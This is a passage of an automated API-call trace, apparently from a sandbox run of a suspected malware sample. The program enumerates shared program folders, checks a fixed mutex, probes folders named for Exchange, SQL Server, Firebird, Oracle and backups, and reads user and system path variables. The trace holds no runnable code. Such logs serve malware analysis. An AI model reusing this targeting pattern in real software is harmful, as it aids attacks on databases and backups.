cAlternateFileName="WEBSER~1")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0104.330] GetLastError () returned 0x12 [0104.330] FindClose (in: hFindFile=0x587720 | out: hFindFile=0x587720) returned 1 [0104.330] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.330] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.330] GlobalUnlock (hMem=0x45000c) returned 0 [0104.330] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.330] GlobalLock (hMem=0x450004) returned 0x591988 [0104.330] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.330] GlobalUnlock (hMem=0x45000c) returned 0 [0104.330] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.330] GlobalUnlock (hMem=0x450004) returned 0 [0104.330] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*.*", lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x587720 [0104.330] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f108 | out: lpLocalFileTime=0x18f108) returned 1 [0104.331] FileTimeToDosDateTime (in: lpFileTime=0x18f108, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.331] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.331] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.331] GlobalUnlock (hMem=0x450004) returned 0 [0104.331] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.331] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.331] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.331] GlobalUnlock (hMem=0x450004) returned 0 [0104.331] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.331] GlobalUnlock (hMem=0x45000c) returned 0 [0104.331] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.331] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.331] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0104.331] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.331] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.331] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.331] GlobalUnlock (hMem=0x45000c) returned 0 [0104.331] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.331] GlobalLock (hMem=0x450004) returned 0x591988 [0104.331] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.331] GlobalUnlock (hMem=0x45000c) returned 0 [0104.331] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.331] GlobalUnlock (hMem=0x450004) returned 0 [0104.332] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.332] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0104.332] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0104.332] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.332] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.332] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.332] GlobalUnlock (hMem=0x450004) returned 0 [0104.332] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.332] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.332] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.332] GlobalUnlock (hMem=0x450004) returned 0 [0104.332] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.332] GlobalUnlock (hMem=0x45000c) returned 0 [0104.332] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.332] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.332] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.332] GlobalUnlock (hMem=0x45000c) returned 0 [0104.332] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.332] GlobalLock (hMem=0x450004) returned 0x591988 [0104.332] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.332] GlobalUnlock (hMem=0x45000c) returned 0 [0104.332] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.332] GlobalUnlock (hMem=0x450004) returned 0 [0104.333] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.333] SysReAllocStringLen (in: pbstr=0x18f104*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", len=0x31 | out: pbstr=0x18f104*="C:\\Program Files\\Common Files\\Microsoft Shared\\DW") returned 1 [0104.333] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.333] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.333] GlobalUnlock (hMem=0x450004) returned 0 [0104.333] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.333] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.333] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.333] GlobalUnlock (hMem=0x450004) returned 0 [0104.333] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.333] GlobalUnlock (hMem=0x45000c) returned 0 [0104.333] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Microsoft\\Exchange Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="䱈@僄W傘W企@\x18㽜V\x18\x1b")) returned 0xffffffff [0104.825] GetLastError () returned 0x3 [0104.825] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.825] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.825] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ Compact Edition\\") returned 21 [0104.825] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Microsoft SQL Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@倴W企@\x18㼔V\x181")) returned 0xffffffff [0104.826] GetLastError () returned 0x2 [0104.826] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.826] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ Compact Edition\\") returned 9 [0104.827] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Firebird", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@僜W企@\x18㥔X\x18;")) returned 0xffffffff [0104.827] GetLastError () returned 0x2 [0104.827] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ Compact Edition\\") returned 8 [0104.828] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\MSSQL.1", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@倴W企@\x18㧴X\x18D")) returned 0xffffffff [0104.828] GetLastError () returned 0x2 [0104.828] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.828] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.828] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0104.829] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@僜W企@\x18V\x18j")) returned 0xffffffff [0104.829] GetLastError () returned 0x2 [0104.829] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.829] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0104.829] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0104.830] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Adobe", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@劬X企@\x18㥔X\x18q")) returned 0xffffffff [0104.830] GetLastError () returned 0x2 [0104.830] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.830] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="adobe\\VP") returned 6 [0104.830] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0104.830] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Oracle", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@倴W企@\x18㧴X\x18y")) returned 0xffffffff [0104.831] GetLastError () returned 0x2 [0104.831] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0104.831] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Archive", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@劬X企@\x18㥔X\x18\x81")) returned 0xffffffff [0104.831] GetLastError () returned 0x2 [0104.832] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0104.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0104.832] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Backup", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@倴W企@\x18㧴X\x18\x88")) returned 0xffffffff [0104.832] GetLastError () returned 0x2 [0104.832] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="backup㥐X\x10") returned 6 [0104.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0104.833] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Reserv", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@劬X企@\x18㥔X\x18\x8f")) returned 0xffffffff [0104.833] GetLastError () returned 0x2 [0104.833] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="reserv㧰X\x10") returned 6 [0104.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0104.834] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Restore", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@倴W企@\x18㧴X\x18\x97")) returned 0xffffffff [0104.834] GetLastError () returned 0x2 [0104.834] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.834] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.834] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.835] GlobalUnlock (hMem=0x45000c) returned 0 [0104.835] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.835] GlobalLock (hMem=0x450004) returned 0x591988 [0104.835] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.835] GlobalUnlock (hMem=0x45000c) returned 0 [0104.835] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.835] GlobalUnlock (hMem=0x450004) returned 0 [0104.835] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.835] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aae8, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.835] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.835] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0104.836] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.836] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.836] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.836] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.836] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.836] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=11, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.836] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.837] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.837] GlobalUnlock (hMem=0x450004) returned 0 [0104.837] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.837] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.837] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.837] GlobalUnlock (hMem=0x450004) returned 0 [0104.837] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.837] GlobalUnlock (hMem=0x45000c) returned 0 [0104.837] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.837] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.839] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=11, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.840] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.840] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | 